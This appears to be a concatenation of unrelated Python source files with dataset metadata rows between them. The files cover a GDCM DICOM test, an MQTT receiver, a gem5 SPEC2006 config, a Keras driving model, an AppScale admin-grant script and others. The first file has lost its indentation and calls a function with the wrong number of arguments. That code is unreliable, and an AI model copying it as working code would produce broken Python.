import gdcm
import os,sys
def TestModifyFields(filename):
outfilename = filename + ".rewrite"
r = gdcm.Reader()
r.SetFileName( filename )
sucess = r.Read()
#print r.GetFile().GetDataSet()
ds = r.GetFile().GetDataSet()
#print dir(ds)
# eg, let's remove a tag
removetag = gdcm.Tag(0x0043,0x106f)
if ds.FindDataElement( removetag ):
ds.Remove( removetag )
# let's replace a value:
replacetag = gdcm.Tag(0x0010,0x0010)
if ds.FindDataElement( replacetag ):
de = ds.GetDataElement( replacetag )
#print dir(de)
patname = "This^is^an^example"
vl = gdcm.VL( len(patname) )
de.SetByteValue( patname, vl )
# let's insert a new dataelement
# <entry group="0012" element="0062" vr="CS" vm="1" name="Patient Identity Removed"/>
pir = gdcm.DataElement( gdcm.Tag(0x0012,0x0062) )
pir.SetVR( gdcm.VR( gdcm.VR.CS ) ) # specify the VR explicitely
yes = "YES"
pir.SetByteValue( yes, gdcm.VL(len(yes)) )
ds.Insert( pir )
# try again but pretend we don't know the VR
# <entry group="0012" element="0063" vr="LO" vm="1-n" name="De-identification Method"/>
deidmethod = gdcm.Tag(0x0012,0x0063)
# retrieve the supreme global instance, sum of all knowledge in da whole universe:
dicomdicts = gdcm.GlobalInstance.GetDicts()
dictel = dicomdicts.GetDictEntry( deidmethod )
#print dictel.GetVR()
deid = gdcm.DataElement( deidmethod )
deid.SetVR( dictel.GetVR() )
methodstr = "Well known Company"
#deid.SetByteValue( methodstr, gdcm.VL(len(methodstr)) )
deid.SetByteValue( methodstr, gdcm.VL(len(methodstr)) )
ds.Insert( deid )
#w = gdcm.Writer()
#w.SetFileName( outfilename )
#w.SetFile( r.GetFile() )
#sucess = w.Write()
return sucess
if __name__ == "__main__":
sucess = 0
try:
filename = os.sys.argv[1]
sucess += TestModifyFields( filename, True )
except:
# loop over all files:
t = gdcm.Testing()
nfiles = t.GetNumberOfFileNames()
for i in range(0,nfiles):
filename = t.GetFileName(i)
sucess += TestModifyFields( filename )
# Test succeed ?
sys.exit(sucess == 0)
| 31.4 | 89 | 0.644061 |
e6a4db12615f9ae1c18b4c36fff2225e9cb1355f | 2,612 | py | Python | src/receive_devices.py | EdrianI/openeew-seismology | 163b6447d125c88bd31fdad938893edb8910e790 | [
"Apache-2.0"
] | null | null | null | src/receive_devices.py | EdrianI/openeew-seismology | 163b6447d125c88bd31fdad938893edb8910e790 | [
"Apache-2.0"
] | null | null | null | src/receive_devices.py | EdrianI/openeew-seismology | 163b6447d125c88bd31fdad938893edb8910e790 | [
"Apache-2.0"
] | null | null | null | """This script receives device data from MQTT by subscribing to the iot-2/type/OpenEEW/id/+/mon"""
import json
from argparse import ArgumentParser
from paho.mqtt.client import Client as MqttClient
class DeviceReceiver:
"""This class subscribes to the MQTT and receivces raw data"""
def __init__(self, df_receivers) -> None:
"""Initializes the DataReceiver object"""
super().__init__()
self.df_receivers = df_receivers
def run(self):
"""Main method that parses command options and executes the rest of the script"""
parser = ArgumentParser()
parser.add_argument("--username", help="MQTT username")
parser.add_argument("--password", help="MQTT password")
parser.add_argument(
"--clientid", help="MQTT clientID", default="recieve_devices_simulator"
)
parser.add_argument(
"--host",
help="MQTT host",
nargs="?",
const="localhost",
default="localhost",
)
parser.add_argument(
"--port", help="MQTT port", nargs="?", type=int, const=1883, default=1883
)
arguments = parser.parse_args()
client = self.create_client(
arguments.host,
arguments.port,
arguments.username,
arguments.password,
arguments.clientid,
)
client.loop_forever()
def create_client(self, host, port, username, password, clientid):
"""Creating an MQTT Client Object"""
client = MqttClient(clientid)
if username and password:
client.username_pw_set(username=username, password=password)
client.on_connect = self.on_connect
client.on_message = self.on_message
client.connect(host=host, port=port)
return client
def on_connect(self, client, userdata, flags, resultcode):
"""Upon connecting to an MQTT server, subscribe to a topic
the production topic is 'iot-2/type/OpenEEW/id/+/mon'"""
topic = "iot-2/type/OpenEEW/id/+/mon"
print(f"✅ Subscribed to devices with result code {resultcode}")
client.subscribe(topic)
def on_message(self, client, userdata, message):
"""When a message is sent to a subscribed topic,
decode the message and send it to another method"""
try:
decoded_message = str(message.payload.decode("utf-8", "ignore"))
data = json.loads(decoded_message)
self.df_receivers.update(data)
except BaseException as exception:
print(exception)
| 34.826667 | 98 | 0.62098 |
5ec368d74dffb9c7a54bd59ebda99b7d9089454b | 100 | py | Python | probed/__main__.py | pyrustic/probed | f47e229f11e5951f7c72d0e539040120f948f86a | [
"MIT"
] | 1 | 2021-11-25T07:11:22.000Z | 2021-11-25T07:11:22.000Z | probed/__main__.py | pyrustic/probed | f47e229f11e5951f7c72d0e539040120f948f86a | [
"MIT"
] | null | null | null | probed/__main__.py | pyrustic/probed | f47e229f11e5951f7c72d0e539040120f948f86a | [
"MIT"
] | null | null | null | def main():
print("https://github.com/pyrustic/probed")
if __name__ == "__main__":
main()
| 14.285714 | 47 | 0.62 |
1ad3608e5e1ffcfa1a68311981bfb5d0cff2bd8f | 4,019 | py | Python | src/python/wiring.py | dulikvor/reactive | 993d0f91a5dbb4ea8dabc240605f46bf35b606e9 | [
"MIT"
] | null | null | null | src/python/wiring.py | dulikvor/reactive | 993d0f91a5dbb4ea8dabc240605f46bf35b606e9 | [
"MIT"
] | null | null | null | src/python/wiring.py | dulikvor/reactive | 993d0f91a5dbb4ea8dabc240605f46bf35b606e9 | [
"MIT"
] | 1 | 2020-07-28T00:00:00.000Z | 2020-07-28T00:00:00.000Z | import sys
from os.path import dirname, join
sys.path.append(join(dirname(__file__), '../../bin/'))
import _pyNode
from datetime import timedelta
class EdgeType(type):
def __getitem__(cls, item):
return Edge(item)
class Edge(metaclass=EdgeType):
__all__ = ['type']
def __init__(self, type):
self.type = type
def idGenerator():
return _pyNode.InputAdapter.generateId()
class OutDescriptorCreator(type):
def __call__(cls, *args, **kwargs):
if cls is OutDescriptor:
return super(OutDescriptorCreator, cls).__call__(*args, **kwargs)
else:
edgeType = None
for arg, (_, value) in zip(args, cls._signature.items()):
if type(value) == Edge and (type(arg) == value.type or value.type == 'T'):
edgeType = type(arg)
elif type(value) == Edge and (type(arg) == value.type or value.type == 'IT'):
_arg = cls.unpackContainer(arg)
edgeType = type(_arg)
else:
cls.validateScalar(arg, value)
if edgeType == None:
raise TypeError('OutDescriptor is missing edge type')
instance = super(OutDescriptorCreator, cls).__call__(idGenerator(), '', edgeType)
setattr(instance, '_args', args)
setattr(instance, '_kwargs', kwargs)
setattr(instance, 'inScore', 0)
setattr(instance, 'nativeNode', instance.create(instance.id))
GraphEngine().addNode(instance)
return instance
def unpackContainer(cls, arg):
while cls.isContainer(arg):
assert len(arg)
arg = arg[0]
return arg
def validateScalar(cls, arg, schemeArg):
if arg == None:
return
while cls.isContainer(arg):
if type(arg) != type(schemeArg):
raise TypeError('mismatch between OutDescriptor parameters - {0} is not instance of {1}'.format(type(arg), type(schemeArg)))
if len(arg) == 0:
return
arg = arg[0]
schemeArg = schemeArg[0]
if type(arg) != schemeArg:
raise TypeError('mismatch between OutDescriptor parameters - {0} is not instance of {1}'.format(type(arg), type(schemeArg)))
def isContainer(cls, arg):
return isinstance(arg, list) or isinstance(arg, tuple) or isinstance(arg, dict)
class OutDescriptorsTuple( tuple ):
pass
class OutDescriptor(metaclass=OutDescriptorCreator):
def __init__(self, id : int, name : str, type, node = None):
self._id = id
self._name = name
self._type = type
self._node = node #owener node
self._consumers = []
def setType(self, type):
if self._type == None:
self._type = type
elif self._type != type:
raise ValueError('Inconsistency with edge data type, new declared type - {0}, original - {1}'.format(type, self._type))
def getType(self):
return self._type
def addConsumer(self, consumer):
consumer.inScore += 1
self._consumers.append(consumer)
def create(self):
pass
@property
def id(self):
return self._id
@property
def node(self):
return self._node
@property
def consumers(self):
return self._consumers
type = property(getType, setType)
class Signature(dict):
pass
def makeOutDescriptor(name, signature, factory):
def create(self, id):
return type(self)._factory.create(*((id,) + self._args), **self._kwargs)
cls = type(name,(OutDescriptor,), {'_factory':factory, '_signature':signature})
setattr(cls, 'create', create)
return cls
const = makeOutDescriptor('const', Signature(value=Edge['T']), _pyNode.ConstNodeFactory)
curve = makeOutDescriptor('curve', Signature(value=Edge['IT'], delta=[timedelta]), _pyNode.CurveNodeFactory)
def __Output__():
pass
from graph_engine import GraphEngine
| 31.155039 | 140 | 0.605126 |
4e3d575f89426a24a333bf84cc036de721453ae0 | 976 | py | Python | Collect/SSEBop/__init__.py | ali1100/wa | 700e5014533c45f38a245c3abdeacc537cb307bc | [
"Apache-2.0"
] | 16 | 2017-04-27T21:22:37.000Z | 2020-10-21T12:57:03.000Z | Collect/SSEBop/__init__.py | ali1100/wa | 700e5014533c45f38a245c3abdeacc537cb307bc | [
"Apache-2.0"
] | 1 | 2017-06-17T08:07:53.000Z | 2017-08-22T12:28:37.000Z | Collect/SSEBop/__init__.py | wateraccounting/wa | 29ed8e7eac732135678a5d171cd5e53a54c95313 | [
"Apache-2.0"
] | 19 | 2016-10-24T13:24:34.000Z | 2020-02-03T17:42:22.000Z | # -*- coding: utf-8 -*-
"""
Authors: Tim Hessels and Gonzalo Espinoza
UNESCO-IHE 2017
Contact: t.hessels@unesco-ihe.org
g.espinoza@unesco-ihe.org
Repository: https://github.com/wateraccounting/wa
Module: Collect/SSEBop
Restrictions:
The data and this python file may not be distributed to others without
permission of the WA+ team due data restriction of the SSEBop developers.
Description:
This module downloads SSEBop data from
ftp.wateraccounting.unesco-ihe.org. Use the SSEBop.monthly function to
download and create monthly SSEBop images in Gtiff format.
Data is available between 2003-01-01 till 2014-10-31. If the FTP version is used
The data goes till present if the V4 version is used (Default)
Examples:
from wa.Collect import SSEBop
SSEBop.monthly(Dir='C:/Temp/', Startdate='2008-12-01', Enddate='2011-01-20',
latlim=[-10, 30], lonlim=[-20, -10])
"""
from .monthly import main as monthly
__all__ = ['monthly']
__version__ = '0.1'
| 30.5 | 80 | 0.740779 |
5ed5cc698e22b8fb8698cbf77b6e7774c3a542ae | 4,446 | py | Python | model.py | shakeelr/CarND-Behavioral-Cloning-P3 | 8542a965a329fe38722e67a206ca19ad03d912bb | [
"MIT"
] | null | null | null | model.py | shakeelr/CarND-Behavioral-Cloning-P3 | 8542a965a329fe38722e67a206ca19ad03d912bb | [
"MIT"
] | null | null | null | model.py | shakeelr/CarND-Behavioral-Cloning-P3 | 8542a965a329fe38722e67a206ca19ad03d912bb | [
"MIT"
] | null | null | null | import sklearn
import csv
import cv2
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from keras.models import Sequential
from keras.layers import Flatten, Dense, Lambda, Cropping2D, BatchNormalization, Dropout, Activation
from keras.layers.convolutional import Convolution2D
from keras.layers.pooling import MaxPooling2D
#read the CSV file
samples = []
with open('./data/driving_log_merged.csv') as csvfile:
reader = csv.reader(csvfile)
for line in reader:
samples.append(line)
#Pop out the first line containing column labels
samples.pop(0)
#generator function for generating batches
def generator(samples, batch_size=64):
num_samples = len(samples)
correction = 0.20
while 1: # Loop forever so the generator never terminates
sklearn.utils.shuffle(samples)
for offset in range(0, num_samples, batch_size):
batch_samples = samples[offset:offset+batch_size]
images = []
angles = []
for batch_sample in batch_samples:
#images are augmented with left/right camera angles
center_name = './data/IMG/'+batch_sample[0].split('/')[-1]
left_name = './data/IMG/'+batch_sample[1].split('/')[-1]
right_name = './data/IMG/'+batch_sample[2].split('/')[-1]
center_image = cv2.imread(center_name)
left_image = cv2.imread(left_name)
right_image = cv2.imread(right_name)
center_angle = float(batch_sample[3])
left_angle = center_angle + correction
right_angle = center_angle - correction
images.append(center_image)
angles.append(center_angle)
images.append(cv2.flip(center_image,1))
angles.append(center_angle*-1.0)
images.append(left_image)
angles.append(left_angle)
images.append(cv2.flip(left_image,1))
angles.append(left_angle*-1.0)
images.append(right_image)
angles.append(right_angle)
images.append(cv2.flip(right_image,1))
angles.append(right_angle*-1.0)
X_train = np.array(images)
y_train = np.array(angles)
yield sklearn.utils.shuffle(X_train, y_train)
# Split the data into training and validation sets (80/20 split).
train_samples, valid_samples = train_test_split(samples, test_size=0.20)
# Training/validation batch generators. Each CSV row yields six augmented
# samples (center/left/right camera, each plus a horizontal flip), so the
# effective sample count per batch is 6 * 150.
train_generator = generator(train_samples, batch_size=150)
valid_generator = generator(valid_samples, batch_size=150)
# I used a model similar to the NVidia self driving car model, with
# the addition of Batch Normalization layers to reduce overfitting
model = Sequential()
# Normalize pixel values from [0, 255] to [-0.5, 0.5].
model.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=(160,320,3)))
# Crop 70 rows from the top (sky) and 25 from the bottom (car hood).
model.add(Cropping2D(cropping=((70,25),(0,0))))
# Three strided 5x5 convolutions, each followed by BatchNorm + ReLU.
model.add(Convolution2D(24,5,5,subsample=(2,2)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Convolution2D(36,5,5,subsample=(2,2)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Convolution2D(48,5,5,subsample=(2,2)))
model.add(BatchNormalization())
model.add(Activation('relu'))
# Two unstrided 3x3 convolutions.
model.add(Convolution2D(64,3,3))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Convolution2D(64,3,3))
model.add(BatchNormalization())
model.add(Activation('relu'))
# Fully connected head regressing a single steering-angle output.
model.add(Flatten())
model.add(Dense(100))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Dense(50))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Dense(10))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Dense(1))
# Mean-squared-error regression loss with the Adam optimizer.
model.compile(loss='mse', optimizer='adam')
# Train the model. The *6 factors account for the six-fold augmentation
# performed by the generator. NOTE(review): samples_per_epoch /
# nb_val_samples / nb_epoch are Keras 1 API argument names.
history_object = model.fit_generator(train_generator, samples_per_epoch=len(train_samples)*6, validation_data=valid_generator,
    nb_val_samples=len(valid_samples)*6, nb_epoch=30)
# Save the trained model to disk.
model.save('model.h5')
# Plot training history (loss curves) for diagnostics.
print(history_object.history.keys())
plt.plot(history_object.history['loss'])
plt.plot(history_object.history['val_loss'])
plt.title('model mean squared error loss')
plt.ylabel('mean squared error loss')
plt.xlabel('epoch')
plt.legend(['training set', 'validation set'], loc='upper right')
plt.show()
46781aa5acd71fd53b325d04589df23128000b74 | 14,570 | py | Python | configs/example/spec06_config.py | irene-lin/InvisiSpec-1.0 | 696ceb57d48f77da1385f2c9e10dc4615350e607 | [
"BSD-3-Clause"
] | 2 | 2020-03-05T23:49:12.000Z | 2020-03-07T22:12:42.000Z | configs/example/spec06_config.py | irene-lin/InvisiSpec-1.0 | 696ceb57d48f77da1385f2c9e10dc4615350e607 | [
"BSD-3-Clause"
] | null | null | null | configs/example/spec06_config.py | irene-lin/InvisiSpec-1.0 | 696ceb57d48f77da1385f2c9e10dc4615350e607 | [
"BSD-3-Clause"
] | 1 | 2020-09-27T06:39:53.000Z | 2020-09-27T06:39:53.000Z | # Copyright (c) 2012-2013 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2006-2008 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Steve Reinhardt
# Simple test script
#
# "m5 test.py"
import optparse
import sys
import os
import m5
from m5.defines import buildEnv
from m5.objects import *
from m5.util import addToPath, fatal, warn
addToPath('../')
from ruby import Ruby
from common import Options
from common import Simulation
from common import CacheConfig
from common import CpuConfig
from common import MemConfig
from common.Caches import *
from common.cpu2000 import *
import spec06_benchmarks
# Check if KVM support has been enabled, we might need to do VM
# configuration if that's the case.
have_kvm_support = 'BaseKvmCPU' in globals()
def is_kvm_cpu(cpu_class):
    """Return True iff KVM support is compiled in and cpu_class is a KVM CPU."""
    if not have_kvm_support or cpu_class is None:
        return False
    return issubclass(cpu_class, BaseKvmCPU)
def get_processes(options):
    """Interprets provided options and returns a list of processes"""

    def split_or_empty(value):
        # Split a semicolon-separated option string, or give back an
        # empty list when the option was left blank.
        return value.split(';') if value != "" else []

    inputs = split_or_empty(options.input)
    outputs = split_or_empty(options.output)
    errouts = split_or_empty(options.errout)
    pargs = split_or_empty(options.options)

    multiprocesses = []
    workloads = options.cmd.split(';')
    for idx, wrkld in enumerate(workloads):
        process = Process(pid = 100 + idx)
        process.executable = wrkld
        process.cwd = os.getcwd()

        # Optional environment file: one VAR=value entry per line.
        if options.env:
            with open(options.env, 'r') as f:
                process.env = [line.rstrip() for line in f]

        # Per-workload arguments and I/O redirection, when provided.
        process.cmd = [wrkld] + (pargs[idx].split() if len(pargs) > idx else [])
        if len(inputs) > idx:
            process.input = inputs[idx]
        if len(outputs) > idx:
            process.output = outputs[idx]
        if len(errouts) > idx:
            process.errout = errouts[idx]

        multiprocesses.append(process)

    # SMT runs every workload on one core; otherwise one thread per CPU.
    if options.smt:
        assert(options.cpu_type == "DerivO3CPU")
        return multiprocesses, len(workloads)
    return multiprocesses, 1
parser = optparse.OptionParser()
Options.addCommonOptions(parser)
Options.addSEOptions(parser)
# SPEC-specific options on top of the standard gem5 SE-mode options.
parser.add_option("-b", "--benchmark", type="string", default="", help="The SPEC benchmark to be loaded.")
parser.add_option("--benchmark_stdout", type="string", default="", help="Absolute path for stdout redirection for the benchmark.")
parser.add_option("--benchmark_stderr", type="string", default="", help="Absolute path for stderr redirection for the benchmark.")
# Ruby registers its own options only when the Ruby memory system is requested.
if '--ruby' in sys.argv:
    Ruby.define_options(parser)
(options, args) = parser.parse_args()
# This script takes no positional arguments; everything is option-driven.
if args:
    print "Error: script doesn't take any positional arguments"
    sys.exit(1)
#multiprocesses = []
numThreads = 1
if options.benchmark:
print 'Selected SPEC_CPU2006 benchmark'
if options.benchmark == 'perlbench':
print '--> perlbench'
process = spec06_benchmarks.perlbench
elif options.benchmark == 'bzip2':
print '--> bzip2'
process = spec06_benchmarks.bzip2
elif options.benchmark == 'gcc':
print '--> gcc'
process = spec06_benchmarks.gcc
elif options.benchmark == 'bwaves':
print '--> bwaves'
process = spec06_benchmarks.bwaves
elif options.benchmark == 'gamess':
print '--> gamess'
process = spec06_benchmarks.gamess
elif options.benchmark == 'mcf':
print '--> mcf'
process = spec06_benchmarks.mcf
elif options.benchmark == 'milc':
print '--> milc'
process = spec06_benchmarks.milc
elif options.benchmark == 'zeusmp':
print '--> zeusmp'
process = spec06_benchmarks.zeusmp
elif options.benchmark == 'gromacs':
print '--> gromacs'
process = spec06_benchmarks.gromacs
elif options.benchmark == 'cactusADM':
print '--> cactusADM'
process = spec06_benchmarks.cactusADM
elif options.benchmark == 'leslie3d':
print '--> leslie3d'
process = spec06_benchmarks.leslie3d
elif options.benchmark == 'namd':
print '--> namd'
process = spec06_benchmarks.namd
elif options.benchmark == 'gobmk':
print '--> gobmk'
process = spec06_benchmarks.gobmk
elif options.benchmark == 'dealII':
print '--> dealII'
process = spec06_benchmarks.dealII
elif options.benchmark == 'soplex':
print '--> soplex'
process = spec06_benchmarks.soplex
elif options.benchmark == 'povray':
print '--> povray'
process = spec06_benchmarks.povray
elif options.benchmark == 'calculix':
print '--> calculix'
process = spec06_benchmarks.calculix
elif options.benchmark == 'hmmer':
print '--> hmmer'
process = spec06_benchmarks.hmmer
elif options.benchmark == 'sjeng':
print '--> sjeng'
process = spec06_benchmarks.sjeng
elif options.benchmark == 'GemsFDTD':
print '--> GemsFDTD'
process = spec06_benchmarks.GemsFDTD
elif options.benchmark == 'libquantum':
print '--> libquantum'
process = spec06_benchmarks.libquantum
elif options.benchmark == 'h264ref':
print '--> h264ref'
process = spec06_benchmarks.h264ref
elif options.benchmark == 'tonto':
print '--> tonto'
process = spec06_benchmarks.tonto
elif options.benchmark == 'lbm':
print '--> lbm'
process = spec06_benchmarks.lbm
elif options.benchmark == 'omnetpp':
print '--> omnetpp'
process = spec06_benchmarks.omnetpp
elif options.benchmark == 'astar':
print '--> astar'
process = spec06_benchmarks.astar
elif options.benchmark == 'wrf':
print '--> wrf'
process = spec06_benchmarks.wrf
elif options.benchmark == 'sphinx3':
print '--> sphinx3'
process = spec06_benchmarks.sphinx3
elif options.benchmark == 'xalancbmk':
print '--> xalancbmk'
process = spec06_benchmarks.xalancbmk
elif options.benchmark == 'specrand_i':
print '--> specrand_i'
process = spec06_benchmarks.specrand_i
elif options.benchmark == 'specrand_f':
print '--> specrand_f'
process = spec06_benchmarks.specrand_f
else:
print "No recognized SPEC2006 benchmark selected! Exiting."
sys.exit(1)
else:
print >> sys.stderr, "Need --benchmark switch to specify SPEC CPU2006 workload. Exiting!\n"
sys.exit(1)
# Set process stdout/stderr
if options.benchmark_stdout:
process.output = options.benchmark_stdout
print "Process stdout file: " + process.output
if options.benchmark_stderr:
process.errout = options.benchmark_stderr
print "Process stderr file: " + process.errout
#if options.bench:
# apps = options.bench.split("-")
# if len(apps) != options.num_cpus:
# print "number of benchmarks not equal to set num_cpus!"
# sys.exit(1)
#
# for app in apps:
# try:
# if buildEnv['TARGET_ISA'] == 'alpha':
# exec("workload = %s('alpha', 'tru64', '%s')" % (
# app, options.spec_input))
# elif buildEnv['TARGET_ISA'] == 'arm':
# exec("workload = %s('arm_%s', 'linux', '%s')" % (
# app, options.arm_iset, options.spec_input))
# else:
# exec("workload = %s(buildEnv['TARGET_ISA', 'linux', '%s')" % (
# app, options.spec_input))
# multiprocesses.append(workload.makeProcess())
# except:
# print >>sys.stderr, "Unable to find workload for %s: %s" % (
# buildEnv['TARGET_ISA'], app)
# sys.exit(1)
#elif options.cmd:
# multiprocesses, numThreads = get_processes(options)
#else:
# print >> sys.stderr, "No workload specified. Exiting!\n"
# sys.exit(1)
(CPUClass, test_mem_mode, FutureClass) = Simulation.setCPUClass(options)
CPUClass.numThreads = numThreads
# Check -- do not allow SMT with multiple CPUs
if options.smt and options.num_cpus > 1:
    fatal("You cannot use SMT with multiple CPUs!")
# NOTE(review): `np` here is the number of CPUs (gem5 config convention),
# not the usual numpy alias.
np = options.num_cpus
system = System(cpu = [CPUClass(cpu_id=i) for i in xrange(np)],
                mem_mode = test_mem_mode,
                mem_ranges = [AddrRange(options.mem_size)],
                cache_line_size = options.cacheline_size)
if numThreads > 1:
    system.multi_thread = True
# Create a top-level voltage domain
system.voltage_domain = VoltageDomain(voltage = options.sys_voltage)
# Create a source clock for the system and set the clock period
system.clk_domain = SrcClockDomain(clock = options.sys_clock,
                                   voltage_domain = system.voltage_domain)
# Create a CPU voltage domain
system.cpu_voltage_domain = VoltageDomain()
# Create a separate clock domain for the CPUs
system.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock,
                                       voltage_domain =
                                       system.cpu_voltage_domain)
# If elastic tracing is enabled, then configure the cpu and attach the elastic
# trace probe
if options.elastic_trace_en:
    CpuConfig.config_etrace(CPUClass, system.cpu, options)
# All cpus belong to a common cpu_clk_domain, therefore running at a common
# frequency.
for cpu in system.cpu:
    cpu.clk_domain = system.cpu_clk_domain
# KVM CPUs need a VM object and SE-mode page tables (x86 hosts only).
if is_kvm_cpu(CPUClass) or is_kvm_cpu(FutureClass):
    if buildEnv['TARGET_ISA'] == 'x86':
        system.kvm_vm = KvmVM()
        # NOTE(review): `multiprocesses` is never defined in this script
        # (the generic workload setup was replaced by the single SPEC
        # `process`, see the commented-out code below); this branch
        # would raise NameError if it were ever reached.
        for process in multiprocesses:
            process.useArchPT = True
            process.kvmInSE = True
    else:
        fatal("KvmCPU can only be used in SE mode with x86")
# Sanity check
if options.fastmem:
    if CPUClass != AtomicSimpleCPU:
        fatal("Fastmem can only be used with atomic CPU!")
    if (options.caches or options.l2cache):
        fatal("You cannot use fastmem in combination with caches!")
if options.simpoint_profile:
    if not options.fastmem:
        # Atomic CPU checked with fastmem option already
        fatal("SimPoint generation should be done with atomic cpu and fastmem")
    if np > 1:
        fatal("SimPoint generation not supported with more than one CPUs")
# Every simulated CPU runs the same SPEC benchmark process.
for i in xrange(np):
    system.cpu[i].workload = process
    print process.cmd
    #if options.smt:
    #    system.cpu[i].workload = multiprocesses
    #elif len(multiprocesses) == 1:
    #    system.cpu[i].workload = multiprocesses[0]
    #else:
    #    system.cpu[i].workload = multiprocesses[i]
    if options.fastmem:
        system.cpu[i].fastmem = True
    if options.simpoint_profile:
        system.cpu[i].addSimPointProbe(options.simpoint_interval)
    if options.checker:
        system.cpu[i].addCheckerCpu()
    system.cpu[i].createThreads()
# Memory system: Ruby when requested, otherwise the classic crossbar + caches.
if options.ruby:
    Ruby.create_system(options, False, system)
    assert(options.num_cpus == len(system.ruby._cpu_ports))
    system.ruby.clk_domain = SrcClockDomain(clock = options.ruby_clock,
                                        voltage_domain = system.voltage_domain)
    for i in xrange(np):
        ruby_port = system.ruby._cpu_ports[i]
        # Create the interrupt controller and connect its ports to Ruby
        # Note that the interrupt controller is always present but only
        # in x86 does it have message ports that need to be connected
        system.cpu[i].createInterruptController()
        # Connect the cpu's cache ports to Ruby
        system.cpu[i].icache_port = ruby_port.slave
        system.cpu[i].dcache_port = ruby_port.slave
        if buildEnv['TARGET_ISA'] == 'x86':
            system.cpu[i].interrupts[0].pio = ruby_port.master
            system.cpu[i].interrupts[0].int_master = ruby_port.slave
            system.cpu[i].interrupts[0].int_slave = ruby_port.master
            system.cpu[i].itb.walker.port = ruby_port.slave
            system.cpu[i].dtb.walker.port = ruby_port.slave
else:
    MemClass = Simulation.setMemClass(options)
    system.membus = SystemXBar()
    system.system_port = system.membus.slave
    CacheConfig.config_cache(options, system)
    MemConfig.config_mem(options, system)
# [InvisiSpec] Configure simulation scheme
if CPUClass == DerivO3CPU:
    CpuConfig.config_scheme(CPUClass, system.cpu, options)
root = Root(full_system = False, system = system)
Simulation.run(options, root, system, FutureClass)
6ca6a411eb5dc75a501b2e18ae7eb65bc635797c | 1,437 | py | Python | scripts/grant_cloud_admin.py | eabyshev/appscale | 1cfb5a609130f415143ec76718e839b0f73ac668 | [
"Apache-2.0"
] | null | null | null | scripts/grant_cloud_admin.py | eabyshev/appscale | 1cfb5a609130f415143ec76718e839b0f73ac668 | [
"Apache-2.0"
] | null | null | null | scripts/grant_cloud_admin.py | eabyshev/appscale | 1cfb5a609130f415143ec76718e839b0f73ac668 | [
"Apache-2.0"
] | 1 | 2021-11-23T08:30:52.000Z | 2021-11-23T08:30:52.000Z | """ Grants cloud admin access to a user. """
import os
import SOAPpy
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "../lib"))
import appscale_info
import constants
def get_soap_accessor():
  """ Returns the SOAP server accessor to deal with application and users.
  Returns:
    A soap server accessor.
  """
  host = appscale_info.get_db_master_ip()
  port = constants.UA_SERVER_PORT
  return SOAPpy.SOAPProxy("https://{0}:{1}".format(host, port))
def usage():
  """ Prints the usage of this script.

  Bug fix: the original message was copied from add_admin_to_app.py — it
  mentioned "an application ID" argument (this script takes none) and the
  example invoked the wrong script name. The message now documents this
  script's actual interface: a single email address. Prints use the
  parenthesized single-argument form, which behaves identically under
  Python 2 and 3.
  """
  print("")
  print("Grants cloud admin access to user for an AppScale cloud.")
  print("Args: email address")
  print("")
  print("Example:")
  print("  python grant_cloud_admin.py bob@appscale.com")
  print("")
if __name__ == "__main__":
  total = len(sys.argv)
  # Expect exactly one argument: the email address of the user to promote.
  if total < 2:
    usage()
    exit(1)
  email = sys.argv[1]
  # The deployment secret authenticates this script to the UAServer.
  secret = appscale_info.get_secret()
  server = get_soap_accessor()
  # NOTE(review): the UAServer SOAP calls return the strings
  # "true"/"false" rather than booleans.
  if server.does_user_exist(email, secret) == "false":
    print "User does not exist."
    exit(1)
  ret = server.set_cloud_admin_status(email, "true", secret)
  if ret == "true":
    print "{0} granted cloud admin access.".format(email)
  else:
    print "Error with user: {0} -- {1}".format(email, ret)
  # Verify cloud admin status.
  if server.is_user_cloud_admin(email, secret) != "true":
    print "ERROR! Unable to verify that the user is now a cloud admin!"
8cfbc740a516692123ffb92c6ed4858ca26324d9 | 23,455 | py | Python | OptiTypePipeline.py | naumenko-sa/OptiType | 07c49bf6fc93e8846e8826df63100a0b069cbe40 | [
"BSD-3-Clause"
